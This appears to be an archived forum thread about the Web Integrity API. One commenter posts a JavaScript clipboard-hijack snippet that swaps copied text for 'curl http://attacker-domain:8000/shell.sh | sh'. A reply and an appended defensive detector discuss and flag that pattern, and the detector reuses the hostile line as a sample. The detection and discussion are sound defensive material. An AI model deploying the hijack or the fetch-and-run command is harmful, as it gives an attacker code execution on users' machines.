zlacker

[return to "Mozilla Standards Positions Opposes Web Integrity API"]
1. egbert+ZT 2023-07-25 10:54:59
>>danShu+(OP)
Number one reason why I do not turn JavaScript on, and I will definitely block WebIntegrityAPI indefinitely.

Basic malware JavaScript snippet:

    <script>
    document.getElementById('copy').addEventListener('copy', function(e) {
        e.clipboardData.setData('text/plain',
            'curl http://attacker-domain:8000/shell.sh | sh\n');
        e.preventDefault();
    });
    </script>
2. wester+YX 2023-07-25 11:29:00
>>egbert+ZT
This particular attack is actually not a concern if you're using fish (or zsh for that matter I think), as it will not execute pasted content without an additional pressing of the enter key.
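A defensive check for the clipboard substitution shown in the first comment and the trailing newline discussed in the second: an added example, not part of the thread, that inspects clipboard text before it is pasted into a terminal. The function names, rule ids and patterns are assumptions made for illustration.

```javascript
// Added example: review clipboard text before it reaches a shell prompt.
// Rule ids and regular expressions are illustrative assumptions.
const RULES = [
  // A line break can act as the Enter key in shells that run pasted text.
  { id: 'newline', test: (t) => /[\r\n]/.test(t) },
  // Non-printing bytes (other than tab, CR, LF) have no place in a command.
  { id: 'control-char', test: (t) => /[\x00-\x08\x0b\x0c\x0e-\x1f\x7f]/.test(t) },
  // A download piped straight into an interpreter, as in the thread's snippet.
  { id: 'pipe-to-shell',
    test: (t) => /\b(?:curl|wget)\b[^|\r\n]*\|\s*(?:sudo\s+)?(?:ba|z|da)?sh\b/i.test(t) },
  // Fetching over unencrypted HTTP.
  { id: 'plain-http', test: (t) => /\bhttp:\/\//i.test(t) },
];

// clipboardText: what is actually on the clipboard.
// visibleSelection: what the user selected on the page (optional).
// Returns the ids of every rule that fired, 'mismatch' first if the
// clipboard does not hold what the user saw.
function inspectPaste(clipboardText, visibleSelection) {
  const findings = RULES.filter((r) => r.test(clipboardText)).map((r) => r.id);
  if (visibleSelection !== undefined && clipboardText !== visibleSelection) {
    findings.unshift('mismatch');
  }
  return findings;
}

// Render control characters as visible \xNN escapes so the text can be
// read safely before anything is executed.
function neutralize(text) {
  return text.replace(/[\x00-\x1f\x7f]/g, (c) =>
    '\\x' + c.charCodeAt(0).toString(16).padStart(2, '0'));
}

// Clipboard string taken from the snippet in the thread; the visible
// selection 'ls -la' is a constructed sample.
const hijacked = 'curl http://attacker-domain:8000/shell.sh | sh\n';
console.log(inspectPaste(hijacked, 'ls -la'));
console.log(neutralize(hijacked));
```
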